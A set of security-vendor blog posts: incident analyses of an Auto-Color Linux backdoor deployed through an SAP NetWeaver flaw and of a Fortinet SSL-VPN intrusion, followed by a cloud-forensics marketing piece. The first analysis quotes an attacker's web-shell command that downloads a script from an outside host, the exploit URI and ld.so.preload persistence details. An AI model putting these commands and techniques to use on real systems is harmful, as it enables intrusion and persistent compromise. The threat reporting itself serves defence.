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July 29, 2025

Auto-Color Backdoor: How Darktrace Thwarted a Stealthy Linux Intrusion

This blog examines a real-world Auto-Color malware attack that originated from the exploitation of CVE-2025-31324. Learn how Darktrace identified and contained the threat using AI-driven detection and response, with additional support from its expert analyst team.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Harriet Rayner
Cyber Analyst
Written by
Owen Finn
Cyber Analyst
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29
Jul 2025

In April 2025, Darktrace identified an Auto-Color backdoor malware attack taking place on the network of a US-based chemicals company.

Over the course of three days, a threat actor gained access to the customer’s network, attempted to download several suspicious files and communicated with malicious infrastructure linked to Auto-Color malware.

After Darktrace successfully blocked the malicious activity and contained the attack, the Darktrace Threat Research team conducted a deeper investigation into the malware.

They discovered that the threat actor had exploited CVE-2025-31324 to deploy Auto-Color as part of a multi-stage attack — the first observed pairing of SAP NetWeaver exploitation with the Auto-Color malware.

Furthermore, Darktrace’s investigation revealed that Auto-Color is now employing suppression tactics to cover its tracks and evade detection when it is unable to complete its kill chain.

What is CVE-2025-31324?

On April 24, 2025, the software provider SAP SE disclosed a critical vulnerability in its SAP Netweaver product, namely CVE-2025-31324. The exploitation of this vulnerability would enable malicious actors to upload files to the SAP Netweaver application server, potentially leading to remote code execution and full system compromise. Despite the urgent disclosure of this CVE, the vulnerability has been exploited on several systems [1]. More information on CVE-2025-31324 can be found in our previous discussion.

What is Auto-Color Backdoor Malware?

The Auto-Color backdoor malware, named after its ability to rename itself to “/var/log/cross/auto-color” after execution, was first observed in the wild in November 2024 and is categorized as a Remote Access Trojan (RAT).

Auto-Colour has primarily been observed targeting universities and government institutions in the US and Asia [2].

What does Auto-Color Backdoor Malware do?

It is known to target Linux systems by exploiting built-in system features like ld.so.preload, making it highly evasive and dangerous, specifically aiming for persistent system compromise through shared object injection.

Each instance uses a unique file and hash, due to its statically compiled and encrypted command-and-control (C2) configuration, which embeds data at creation rather than retrieving it dynamically at runtime. The behavior of the malware varies based on the privilege level of the user executing it and the system configuration it encounters.

How does Auto-Color work?

The malware’s process begins with a privilege check; if the malware is executed without root privileges, it skips the library implant phase and continues with limited functionality, avoiding actions that require system-level access, such as library installation and preload configuration, opting instead to maintain minimal activity while continuing to attempt C2 communication. This demonstrates adaptive behavior and an effort to reduce detection when running in restricted environments.

If run as root, the malware performs a more invasive installation, installing a malicious shared object, namely **libcext.so.2**, masquerading as a legitimate C utility library, a tactic used to blend in with trusted system components. It uses dynamic linker functions like dladdr() to locate the base system library path; if this fails, it defaults to /lib.

Gaining persistence through preload manipulation

To ensure persistence, Auto-Color modifies or creates /etc/ld.so.preload, inserting a reference to the malicious library. This is a powerful Linux persistence technique as libraries listed in this file are loaded before any others when running dynamically linked executables, meaning Auto-Color gains the ability to silently hook and override standard system functions across nearly all applications.

Once complete, the ELF binary copies and renames itself to “**/var/log/cross/auto-color**”, placing the implant in a hidden directory that resembles system logs. It then writes the malicious shared object to the base library path.

A delayed payload activated by outbound communication

To complete its chain, Auto-Color attempts to establish an outbound TLS connection to a hardcoded IP over port 443. This enables the malware to receive commands or payloads from its operator via API requests [2].

Interestingly, Darktrace found that Auto-Color suppresses most of its malicious behavior if this connection fails - an evasion tactic commonly employed by advanced threat actors. This ensures that in air-gapped or sandboxed environments, security analysts may be unable to observe or analyze the malware’s full capabilities.

If the C2 server is unreachable, Auto-Color effectively stalls and refrains from deploying its full malicious functionality, appearing benign to analysts. This behavior prevents reverse engineering efforts from uncovering its payloads, credential harvesting mechanisms, or persistence techniques.

In real-world environments, this means the most dangerous components of the malware only activate when the attacker is ready, remaining dormant during analysis or detonation, and thereby evading detection.

Darktrace’s coverage of the Auto-Color malware

Initial alert to Darktrace’s SOC

On April 28, 2025, Darktrace’s Security Operations Centre (SOC) received an alert for a suspicious ELF file downloaded on an internet-facing device likely running SAP Netweaver. ELF files are executable files specific to Linux, and in this case, the unexpected download of one strongly indicated a compromise, marking the delivery of the Auto-Color malware.

Figure 1: A timeline breaking down the stages of the attack

Early signs of unusual activity detected by Darktrace

While the first signs of unusual activity were detected on April 25, with several incoming connections using URIs containing /developmentserver/metadatauploader, potentially scanning for the CVE-2025-31324 vulnerability, active exploitation did not begin until two days later.

Initial compromise via ZIP file download followed by DNS tunnelling requests

In the early hours of April 27, Darktrace detected an incoming connection from the malicious IP address 91.193.19[.]109[.] 6.

The telltale sign of CVE-2025-31324 exploitation was the presence of the URI ‘/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1’, combined with a ZIP file download.

The device immediately made a DNS request for the Out-of-Band Application Security Testing (OAST) domain aaaaaaaaaaaa[.]d06oojugfd4n58p4tj201hmy54tnq4rak[.]oast[.]me.

OAST is commonly used by threat actors to test for exploitable vulnerabilities, but it can also be leveraged to tunnel data out of a network via DNS requests.

Darktrace’s Autonomous Response capability quickly intervened, enforcing a “pattern of life” on the offending device for 30 minutes. This ensured the device could not deviate from its expected behavior or connections, while still allowing it to carry out normal business operations.

Figure 2: Alerts from the device’s Model Alert Log showing possible DNS tunnelling requests to ‘request bin’ services.
Figure 3: Darktrace’s Autonomous Response enforcing a “pattern of life” on the compromised device following a suspicious tunnelling connection.

Continued malicious activity

The device continued to receive incoming connections with URIs containing ‘/developmentserver/metadatauploader’. In total seven files were downloaded (see filenames in Appendix).

Around 10 hours later, the device made a DNS request for ‘ocr-freespace.oss-cn-beijing.aliyuncs[.]com’.

In the same second, it also received a connection from 23.186.200[.]173 with the URI ‘/irj/helper.jsp?cmd=curl -O hxxps://ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh’, which downloaded a shell script named config.sh.

Execution

This script was executed via the helper.jsp file, which had been downloaded during the initial exploit, a technique also observed in similar SAP Netweaver exploits [4].

Darktrace subsequently observed the device making DNS and SSL connections to the same endpoint, with another inbound connection from 23.186.200[.]173 and the same URI observed again just ten minutes later.

The device then went on to make several connections to 47.97.42[.]177 over port 3232, an endpoint associated with Supershell, a C2 platform linked to backdoors and commonly deployed by China-affiliated threat groups [5].

Less than 12 hours later, and just 24 hours after the initial exploit, the attacker downloaded an ELF file from http://146.70.41.178:4444/logs, which marked the delivery of the Auto-Color malware.

Figure 4: Darktrace’s detection of unusual outbound connections and the subsequent file download from http://146.70.41.178:4444/logs, as identified by Cyber AI Analyst.

A deeper investigation into the attack

Darktrace’s findings indicate that CVE-2025-31324 was leveraged in this instance to launch a second-stage attack, involving the compromise of the internet-facing device and the download of an ELF file representing the Auto-Color malware—an approach that has also been observed in other cases of SAP NetWeaver exploitation [4].

Darktrace identified the activity as highly suspicious, triggering multiple alerts that prompted triage and further investigation by the SOC as part of the Darktrace Managed Detection and Response (MDR) service.

During this investigation, Darktrace analysts opted to extend all previously applied Autonomous Response actions for an additional 24 hours, providing the customer’s security team time to investigate and remediate.

Figure 5: Cyber AI Analyst’s investigation into the unusual connection attempts from the device to the C2 endpoint.

At the host level, the malware began by assessing its privilege level; in this case, it likely detected root access and proceeded without restraint. Following this, the malware began the chain of events to establish and maintain persistence on the device, ultimately culminating an outbound connection attempt to its hardcoded C2 server.

Figure 6: Cyber AI Analyst’s investigation into the unusual connection attempts from the device to the C2 endpoint.

Over a six-hour period, Darktrace detected numerous attempted connections to the endpoint 146.70.41[.]178 over port 443. In response, Darktrace’s Autonomous Response swiftly intervened to block these malicious connections.

Given that Auto-Color relies heavily on C2 connectivity to complete its execution and uses shared object preloading to hijack core functions without modifying existing binaries, the absence of a successful connection to its C2 infrastructure (in this case, 146.70.41[.]178) causes the malware to sleep before trying to reconnect.

While Darktrace’s analysis was limited by the absence of a live C2, prior research into its command structure reveals that Auto-Color supports a modular C2 protocol. This includes reverse shell initiation (0x100), file creation and execution tasks (0x2xx), system proxy configuration (0x300), and global payload manipulation (0x4XX). Additionally, core command IDs such as 0,1, 2, 4, and 0xF cover basic system profiling and even include a kill switch that can trigger self-removal of the malware [2]. This layered command set reinforces the malware’s flexibility and its dependence on live operator control.

Thanks to the timely intervention of Darktrace’s SOC team, who extended the Autonomous Response actions as part of the MDR service, the malicious connections remained blocked. This proactive prevented the malware from escalating, buying the customer’s security team valuable time to address the threat.

Conclusion

Ultimately, this incident highlights the critical importance of addressing high-severity vulnerabilities, as they can rapidly lead to more persistent and damaging threats within an organization’s network. Vulnerabilities like CVE-2025-31324 continue to be exploited by threat actors to gain access to and compromise internet-facing systems. In this instance, the download of Auto-Color malware was just one of many potential malicious actions the threat actor could have initiated.

From initial intrusion to the failed establishment of C2 communication, the Auto-Color malware showed a clear understanding of Linux internals and demonstrated calculated restraint designed to minimize exposure and reduce the risk of detection. However, Darktrace’s ability to detect this anomalous activity, and to respond both autonomously and through its MDR offering, ensured that the threat was contained. This rapid response gave the customer’s internal security team the time needed to investigate and remediate, ultimately preventing the attack from escalating further.

Credit to Harriet Rayner (Cyber Analyst), Owen Finn (Cyber Analyst), Tara Gould (Threat Research Lead) and Ryan Traill (Analyst Content Lead)

Appendices

MITRE ATT&CK Mapping

Malware - RESOURCE DEVELOPMENT - T1588.001

Drive-by Compromise - INITIAL ACCESS - T1189

Data Obfuscation - COMMAND AND CONTROL - T1001

Non-Standard Port - COMMAND AND CONTROL - T1571

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - EXFILTRATION - T1048.003

Masquerading - DEFENSE EVASION - T1036

Application Layer Protocol - COMMAND AND CONTROL - T1071

Unix Shell – EXECUTION - T1059.004

LC_LOAD_DYLIB Addition – PERSISTANCE - T1546.006

Match Legitimate Resource Name or Location – DEFENSE EVASION - T1036.005

Web Protocols – COMMAND AND CONTROL - T1071.001

Indicators of Compromise (IoCs)

Filenames downloaded:

  • exploit.properties
  • helper.jsp
  • 0KIF8.jsp
  • cmd.jsp
  • test.txt
  • uid.jsp
  • vregrewfsf.jsp

Auto-Color sample:

  • 270fc72074c697ba5921f7b61a6128b968ca6ccbf8906645e796cfc3072d4c43 (sha256)

IP Addresses

  • 146[.]70[.]19[.]122
  • 149[.]78[.]184[.]215
  • 196[.]251[.]85[.]31
  • 120[.]231[.]21[.]8
  • 148[.]135[.]80[.]109
  • 45[.]32[.]126[.]94
  • 110[.]42[.]42[.]64
  • 119[.]187[.]23[.]132
  • 18[.]166[.]61[.]47
  • 183[.]2[.]62[.]199
  • 188[.]166[.]87[.]88
  • 31[.]222[.]254[.]27
  • 91[.]193[.]19[.]109
  • 123[.]146[.]1[.]140
  • 139[.]59[.]143[.]102
  • 155[.]94[.]199[.]59
  • 165[.]227[.]173[.]41
  • 193[.]149[.]129[.]31
  • 202[.]189[.]7[.]77
  • 209[.]38[.]208[.]202
  • 31[.]222[.]254[.]45
  • 58[.]19[.]11[.]97
  • 64[.]227[.]32[.]66

Darktrace Model Detections

Compromise / Possible Tunnelling to Bin Services

Anomalous Server Activity / New User Agent from Internet Facing System

Anomalous File / Incoming ELF File

Anomalous Connection / Application Protocol on Uncommon Port

Anomalous Connection / New User Agent to IP Without Hostname

Experimental / Mismatched MIME Type From Rare Endpoint V4

Compromise / High Volume of Connections with Beacon Score

Device / Initial Attack Chain Activity

Device / Internet Facing Device with High Priority Alert

Compromise / Large Number of Suspicious Failed Connections

Model Alerts for CVE

Compromise / Possible Tunnelling to Bin Services

Compromise / High Priority Tunnelling to Bin Services

Autonomous Response Model Alerts

Antigena / Network::External Threat::Antigena Suspicious File Block

Antigena / Network::External Threat::Antigena File then New Outbound Block

Antigena / Network::Significant Anomaly::Antigena Controlled and Model Alert

Experimental / Antigena File then New Outbound Block

Antigena / Network::External Threat::Antigena Suspicious Activity Block

Antigena / Network::Significant Anomaly::Antigena Alerts Over Time Block

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

Antigena / Network::Significant Anomaly::Antigena Alerts Over Time Block

Antigena / MDR::Model Alert on MDR-Actioned Device

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

References

1. [Online] https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/.

2. https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/. [Online]

3. [Online] (https://www.darktrace.com/blog/tracking-cve-2025-31324-darktraces-detection-of-sap-netweaver-exploitation-before-and-after-disclosure#:~:text=June%2016%2C%202025-,Tracking%20CVE%2D2025%2D31324%3A%20Darktrace's%20detection%20of%20SAP%20Netweaver,guidance%.

4. [Online] https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/.

5. [Online] https://www.forescout.com/blog/threat-analysis-sap-vulnerability-exploited-in-the-wild-by-chinese-threat-actor/.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Harriet Rayner
Cyber Analyst
Written by
Owen Finn
Cyber Analyst

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August 15, 2025

From Exploit to Escalation: Tracking and Containing a Real-World Fortinet SSL-VPN Attack

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Threat actors exploiting Fortinet CVEs

Over the years, Fortinet has issued multiple alerts about a wave of sophisticated attacks targeting vulnerabilities in its SSL-VPN infrastructure. Despite the release of patches to address these vulnerabilities, threat actors have continued to exploit a trio of Common Vulnerabilities and Exposures (CVEs) disclosed between 2022 and 2024 to gain unauthorized access to FortiGate devices.

Which vulnerabilities are exploited?

The vulnerabilities—CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762—affect Fortinet’s SSL-VPN services and have been actively exploited by threat actors to establish initial access into target networks.

The vulnerabilities affect core components of FortiOS, allowing attackers to execute remote code on affected systems.

CVE-2022-42475

Type: Heap-Based Buffer Overflow in FortiOS SSL-VPN

Impact: Remote Code Execution (Actively Exploited)

This earlier vulnerability also targets the SSL-VPN interface and has been actively exploited in the wild. It allows attackers to execute arbitrary code remotely by overflowing a buffer in memory, often used to deploy malware or establish persistent backdoors [6].

CVE-2023-27997

Type: Heap-Based Buffer Overflow in FortiOS and FortiProxy

Impact: Remote Code Execution

This flaw exists in the SSL-VPN component of both FortiOS and FortiProxy. By exploiting a buffer overflow in the heap memory, attackers can execute malicious code remotely. This vulnerability is particularly dangerous because it can be triggered without authentication, making it ideal for an initial compromise [5].

CVE-2024-21762

Type: Out-of-Bounds Write in sslvpnd

Impact: Remote Code Execution

This vulnerability affects the SSL-VPN daemon (sslvpnd) in FortiOS. It allows unauthenticated remote attackers to send specially crafted HTTP requests that write data outside of allocated memory bounds. This can lead to arbitrary code execution, giving attackers full control over a device [4].

In short, these flaws enable remote attackers to execute arbitrary code without authentication by exploiting memory corruption issues such as buffer overflows and out-of-bounds writes. Once inside, threat actors use symbolic link (symlink) in order to maintain persistence on target devices across patches and firmware updates. This persistence then enables them to bypass security controls and manipulate firewall configurations, effectively turning patched systems into long-term footholds for deeper network compromise [1][2][3].

Darktrace’s Coverage

Darktrace detected a series of suspicious activities originating from a compromised Fortinet VPN device, including anomalous HTTP traffic, internal network scanning, and SMB reconnaissance, all indicative of post-exploitation behavior. Following initial detection by Darktrace’s real-time models, its Autonomous Response capability swiftly acted on the malicious activity, blocking suspicious connections and containing the threat before further compromise could occur.

Further investigation by Darktrace’s Threat Research team uncovered a stealthy and persistent attack that leveraged known Fortinet SSL-VPN vulnerabilities to facilitate lateral movement and privilege escalation within the network.

Phase 1: Initial Compromise – Fortinet VPN Exploitation

The attack on a Darktrace customer likely began on April 11 with the exploitation of a Fortinet VPN device running an outdated version of FortiOS. Darktrace observed a high volume of HTTP traffic originating from this device, specifically targeting internal systems. Notably, many of these requests were directed at the /cgi-bin/ directory,  a common target for attackers attempting to exploit web interfaces to run unauthorized scripts or commands. This pattern strongly indicated remote code execution attempts via the SSL-VPN interface [7].

Once access was gained, the threat actor likely modified existing firewall rules, a tactic often used to disable security controls or create hidden backdoors for future access. While Darktrace does not have direct visibility into firewall configuration changes, the surrounding activity and post-exploitation behavior indicated that such modifications were made to support long-term persistence within the network.

HTTP activity from the compromised Fortinet device, including repeated requests to /cgi-bin/ over port 8080.
Figure 1: HTTP activity from the compromised Fortinet device, including repeated requests to /cgi-bin/ over port 8080

Phase 2: Establishing Persistence & Lateral Movement

Shortly after the initial compromise of the Fortinet VPN device, the threat actor began to expand their foothold within the internal network. Darktrace detected initial signs of network scanning from this device, including the use of Nmap to probe the internal environment, likely in an attempt to identify accessible services and vulnerable systems.

Darktrace’s detection of unusual network scanning activities on the affected device.
Figure 2: Darktrace’s detection of unusual network scanning activities on the affected device.

Around the same time, Darktrace began detecting anomalous activity on a second device, specifically an internal firewall interface device. This suggested that the attacker had established a secondary foothold and was leveraging it to conduct deeper reconnaissance and move laterally through the network.

In an effort to maintain persistence within the network, the attackers likely deployed symbolic links in the SSL-VPN language file directory on the Fortinet device. While Darktrace did not directly observe symbolic link abuse, Fortinet has identified this as a known persistence technique in similar attacks [2][3]. Based on the observed post-exploitation behavior and likely firewall modifications, it is plausible that such methods were used here.

Phase 3: Internal Reconnaissance & Credential Abuse

With lateral movement initiated from the internal firewall interface device, the threat actor proceeded to escalate their efforts to map the internal network and identify opportunities for privilege escalation.

Darktrace observed a successful NTLM authentication from the internal firewall interface to the domain controller over the outdated protocol SMBv1, using the account ‘anonymous’. This was immediately followed by a failed NTLM session connection using the hostname ‘nmap’, further indicating the use of Nmap for enumeration and brute-force attempts. Additional credential probes were also identified around the same time, including attempts using the credential ‘guest’.

Darktrace detection of a series of login attempts using various credentials, with a mix of successful and unsuccessful attempts.
Figure 3: Darktrace detection of a series of login attempts using various credentials, with a mix of successful and unsuccessful attempts.

The attacker then initiated DCE_RPC service enumeration, with over 300 requests to the Endpoint Mapper endpoint on the domain controller. This technique is commonly used to discover available services and their bindings, often as a precursor to privilege escalation or remote service manipulation.

Over the next few minutes, Darktrace detected more than 1,700 outbound connections from the internal firewall interface device to one of the customer’s subnets. These targeted common services such as FTP (port 21), SSH (22), Telnet (23), HTTP (80), and HTTPS (443). The threat actor also probed administrative and directory services, including ports 135, 137, 389, and 445, as well as remote access via RDP on port 3389.

Further signs of privilege escalation attempts were observed with the detection of over 300 Netlogon requests to the domain controller. Just over half of these connections were successful, indicating possible brute-force authentication attempts, credential testing, or the use of default or harvested credentials.

Netlogon and DCE-RPC activity from the affected device, showing repeated service bindings to epmapper and Netlogon, followed by successful and failed NetrServerAuthenticate3 attempts.
Figure 4: Netlogon and DCE-RPC activity from the affected device, showing repeated service bindings to epmapper and Netlogon, followed by successful and failed NetrServerAuthenticate3 attempts.

Phase 4: Privilege Escalation & Remote Access

A few minutes later, the attacker initiated an RDP session from the internal firewall interface device to an internal server. The session lasted over three hours, during which more than 1.5MB of data was uploaded and over 5MB was downloaded.

Notably, no RDP cookie was observed during this session, suggesting manual access, tool-less exploitation, or a deliberate attempt to evade detection. While RDP cookie entries were present on other occasions, none were linked to this specific session—reinforcing the likelihood of stealthy remote access.

Additionally, multiple entries during and after this session show SSL certificate validation failures on port 3389, indicating that the RDP connection may have been established using self-signed or invalid certificates, a common tactic in unauthorized or suspicious remote access scenarios.

Darktrace’s detection of an RDP session from the firewall interface device to the server, lasting over 3 hours.
Figure 5: Darktrace’s detection of an RDP session from the firewall interface device to the server, lasting over 3 hours.

Darktrace Autonomous Response

Throughout the course of this attack, Darktrace’s Autonomous Response capability was active on the customer’s network. This enabled Darktrace to autonomously intervene by blocking specific connections and ports associated with the suspicious activity, while also enforcing a pre-established “pattern of life” on affected devices to ensure they were able to continue their expected business activities while preventing any deviations from it. These actions were crucial in containing the threat and prevent further lateral movement from the compromised device.

Darktrace’s Autonomous Response targeted specific connections and restricted affected devices to their expected patterns of life.
Figure 6: Darktrace’s Autonomous Response targeted specific connections and restricted affected devices to their expected patterns of life.

Conclusion

This incident highlights the importance of important staying on top of patching and closely monitoring VPN infrastructure, especially for internet-facing systems like Fortinet devices. Despite available patches, attackers were still able to exploit known vulnerabilities to gain access, move laterally and maintain persistence within the customer’s network.

Attackers here demonstrated a high level of stealth and persistence. Not only did they gain access to the network and carry out network scans and lateral movement, but they also used techniques such as symbolic link abuse, credential probing, and RDP sessions without cookies to avoid detection.  Darktrace’s detection of the post-exploitation activity, combined with the swift action of its Autonomous Response technology, successfully blocked malicious connections and contained the attack before it could escalate

Credit to Priya Thapa (Cyber Analyst), Vivek Rajan (Cyber Analyst), and Ryan Traill (Analyst Content Lead)

Appendices

Real-time Detection Model Alerts

·      Device / Suspicious SMB Scanning Activity

·      Device / Anomalous Nmap Activity

·      Device / Network Scan

·      Device / RDP Scan

·      Device / ICMP Address Scan

Autonomous Response Model Alerts:  

·      Antigena / Network / Insider Threat / Antigena Network Scan Block

·       Antigena / Network / Significant Anomaly / Antigena Significant Anomaly from Client Block

MITRE ATT&CK Mapping

Initial Access – External Remote Services – T1133

Initial Access – Valid Accounts – T1078

Execution – Exploitation for Client Execution – T1203

Persistence – Account Manipulation – T1098

Persistence – Application Layer Protocol – T1071.001

Privilege Escalation – Exploitation for Privilege Escalation – T1068

Privilege Escalation – Valid Accounts – T1078

Defense Evasion – Masquerading – T1036

Credential Access – Brute Force – T1110

Discovery – Network Service Scanning – T1046

Discovery – Remote System Discovery – T1018

Lateral Movement – Remote Services – T1021

Lateral Movement – Software Deployment Tools – T1072

Collection – Data from Local System – T1005

Collection – Data Staging – T1074

Exfiltration – Exfiltration Over Alternative Protocol – T1048

References

[1]  https://www.tenable.com/blog/cve-2024-21762-critical-fortinet-fortios-out-of-bound-write-ssl-vpn-vulnerability

[2] https://thehackernews.com/2025/04/fortinet-warns-attackers-retain.html

[3] https://www.cisa.gov/news-events/alerts/2025/04/11/fortinet-releases-advisory-new-post-exploitation-technique-known-vulnerabilities

[4] https://www.fortiguard.com/psirt/FG-IR-24-015

[5] https://www.tenable.com/blog/cve-2023-27997-heap-based-buffer-overflow-in-fortinet-fortios-and-fortiproxy-ssl-vpn-xortigate

[6]  https://www.tenable.com/blog/cve-2022-42475-fortinet-patches-zero-day-in-fortios-ssl-vpns

[7] https://www.fortiguard.com/encyclopedia/ips/12475

The content provided in this blog is published by Darktrace for general informational purposes only and reflects our understanding of cybersecurity topics, trends, incidents, and developments at the time of publication. While we strive to ensure accuracy and relevance, the information is provided “as is” without any representations or warranties, express or implied. Darktrace makes no guarantees regarding the completeness, accuracy, reliability, or timeliness of any information presented and expressly disclaims all warranties.

Nothing in this blog constitutes legal, technical, or professional advice, and readers should consult qualified professionals before acting on any information contained herein. Any references to third-party organizations, technologies, threat actors, or incidents are for informational purposes only and do not imply affiliation, endorsement, or recommendation.

Darktrace, its affiliates, employees, or agents shall not be held liable for any loss, damage, or harm arising from the use of or reliance on the information in this blog.

The cybersecurity landscape evolves rapidly, and blog content may become outdated or superseded. We reserve the right to update, modify, or remove any content without notice.

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Priya Thapa
Cyber Analyst

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August 15, 2025

How Organizations are Addressing Cloud Investigation and Response

Cloud investigation and responseDefault blog imageDefault blog image

Why cloud investigation and response needs to evolve

As organizations accelerate their move to the cloud, they’re confronting two interrelated pressures: a rapidly expanding attack surface and rising regulatory scrutiny. The dual pressure is forcing security practitioners to evolve their strategies in the cloud, particularly around investigation and response, where we see analysts spending the most time. This work is especially difficult in the cloud, often requiring experienced analysts to manually stitch together evidence across fragmented systems, unfamiliar platforms, and short-lived assets.

However, adapting isn’t easy. Many teams are operating with limited budgets and face a shortage of cloud-specific security talent. That’s why more organizations are now prioritizing tools that not only deliver deep visibility and rapid response in the cloud, but also help upskill their analysts to keep pace with threats and compliance demands.

Our 2024 survey report highlights just how organizations are recognizing gaps in their cloud security, feeling the heat from regulators, and making significant investments to bolster their cloud investigation capabilities.

In this blog post, we’ll explore the current challenges, approaches, and strategies organizations are employing to enhance their cloud investigation and incident response.

Recognizing the gaps in current cloud investigation and response methods

Complex environments & static tools

Due to the dynamic nature of cloud infrastructure, ephemeral assets, autoscaling environments, and multi-cloud complexity, traditional investigation and response methods which rely on static snapshots and point-in-time data, are fundamentally mismatched. And with Cloud environment APIs needing deep provider knowledge and scripting skills to extract much needed evidence its unrealistic for one person to master all aspects of cloud incident response.

Analysts are still stitching together logs from fragmented systems, manually correlating events, and relying on post-incident forensics that often arrive too late to drive meaningful response. These approaches were built for environments that rarely changed. In the cloud, where assets may only exist for minutes and attacker movement can span regions or accounts in seconds, point-in-time visibility simply can’t keep up. As a result, critical evidence is missed, timelines are incomplete, and investigations drag on longer than they should.

Even some modern approaches still depend heavily on static configurations, delayed snapshots, or siloed visibility that can’t keep pace with real-time attacker movement.

There is even the problem of  identifying what cloud data sources hold the valuable information needed to investigate in the first place. With AWS alone having over 200 products, each with its own security practices and data sources.It can be challenging to identify where you need to be looking.  

To truly secure the cloud, investigation and response must be continuous, automated, and context-rich. Tools should be able to surface the signal from the noise and support analysts at every step, even without deep forensics expertise.

Increasing compliance pressure

With the rise of data privacy regulations and incident reporting mandates worldwide, organizations face heightened scrutiny. Noncompliance can lead to severe penalties, making it crucial to have robust cloud investigation and response mechanisms in place. 74% of organizations surveyed reported that data privacy regulations complicate incident response, underscoring the urgency to adapt to regulatory requirements.

In addition, a majority of organizations surveyed (89%) acknowledged that they suffer damage before they can fully contain and investigate incidents, particularly in cloud environments, highlighting the need for enhanced cloud capabilities.  

Enhancing cloud investigation and response

To address these challenges, organizations are actively growing their capabilities to perform investigations in the cloud. Key steps include:

Allocating and increasing budgets:  

Recognizing the importance of cloud-specific investigation tools, many organizations have started to allocate dedicated budgets for cloud forensics. 83% of organizations have budgeted for cloud forensics, with 77% expecting this budget to increase. This reflects a strong commitment to improving cloud security.

Implementing automation that understands cloud behavior

Automation isn’t just about speeding up tasks. While modern threats require speed and efficiency from defenders, automation aims to achieve this by enabling consistent decision making across unique and dynamic environments. Traditional SOAR platforms, often designed for static on-prem environments, struggle to keep pace with the dynamic and ephemeral nature of the cloud, where resources can disappear before a human analyst even has a chance to look at them. Cloud-native automation, designed to act on transient infrastructure and integrate seamlessly with cloud APIs, is rapidly emerging as the more effective approach for real-time investigation and response. Automation can cover collection, processing, and storage of incident evidence without ever needing to wait for human intervention and the evidence is ready and waiting all in once place, regardless of if the evidence is cloud-provider logs, disk images, or  memory dumps. With the right automation tools you can even go further and automate the full process from end to end covering acquisition, processing, analysis, and response.

Artificial Intelligence (AI) that augments analysts’ intuition not just adds speed

While many vendors tout AI’s ability to “analyze large volumes of data,” that’s table stakes. The real differentiator is how AI understands the narrative of an incident, surfacing high-fidelity alerts, correlating attacker movement across cloud and hybrid environments, and presenting findings in a way that upskills rather than overwhelms analysts.  

In this space, AI isn’t just accelerating investigations, it’s democratizing them by reducing the reliance on highly specialized forensic expertise.  

Strategies for effective cloud investigation and response

Organizations are also exploring various strategies to optimize their cloud investigation and response capabilities:

Enhancing visibility and control:

  • Unified platforms: Implementing platforms that provide a unified view across multiple cloud environments can help organizations achieve better visibility and control. This consolidation reduces the complexity of managing disparate tools and data sources.
  • Improved integration: Ensuring that all security tools and platforms are seamlessly integrated is critical. This integration facilitates better data sharing and cohesive incident management.
  • Cloud specific expertise: Training and Recruitment: Investing in training programs to develop cloud-specific skills among existing staff and recruiting experts with cloud security knowledge can bridge the skill gap.
  • Continuous learning: Given the constantly evolving nature of cloud threats, continuous learning and adaptation are essential for maintaining effective security measures.

Leveraging automation and AI:

  • Automation solutions: Automation solutions for cloud environments can significantly speed up and simplify incident response efficiency. These solutions can handle repetitive tasks, allowing security teams to focus on more complex issues.
  • AI powered analysis: AI can assist in rapidly analyzing incident data, identifying anomalies, and predicting potential threats. This proactive approach can help prevent incidents before they escalate.

Cloud investigation and response with Darktrace

Darktrace’s  forensic acquisition & investigation capabilities helps organizations address the complexities of cloud investigations and incident response with ease. The product seamlessly integrates with AWS, GCP, and Azure, consolidating data from multiple cloud environments into one unified platform. This integration enhances visibility and control, making it easier to manage and respond to incidents across diverse cloud infrastructures.

By leveraging machine learning and automation, Forensic Acquisition & Investigation accelerates the investigation process by quickly analyzing vast amounts of data, identifying patterns, and providing actionable insights. Automation reduces manual effort and response times, allowing your security team to focus on the most pressing issues.

Forensic Acquisition & Investigation can help you stay ahead of threats whilst also meeting regulatory requirements, helping you to maintain a robust cloud security position.

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About the author
Calum Hall
Technical Content Researcher
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